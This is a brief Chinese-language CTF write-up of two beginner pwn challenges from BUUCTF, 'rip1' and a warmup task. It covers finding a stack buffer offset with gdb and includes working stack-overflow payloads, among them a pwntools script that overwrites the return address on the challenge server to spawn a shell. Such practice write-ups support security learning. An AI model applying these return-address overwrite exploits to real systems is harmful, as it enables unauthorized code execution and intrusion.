做了两道水题,我就是个废物
第一题 buu rip1
这里很神奇,可以通过代码看出s是15个字节的
但是通过gdb调试rbp到rsp之间有16字节,实际上仔细看第一行最后一个数字是d0不是41(A)
所以要构造15+8=23字节的垃圾数据
payload=b"A"*23+p64(0x401016)+p64(0x401186)
第二题 warmup题
1 from pwn import *
2 context.log_level = ‘debug’ #显示调试的信息
3 p = remote(“node3.buuoj.cn”,29083)
4 bin_sh_addr = 0x40060d
5 payload =b"A"*72 + p64(bin_sh_addr)
6 p.sendline(payload)
7 p.interactive()
~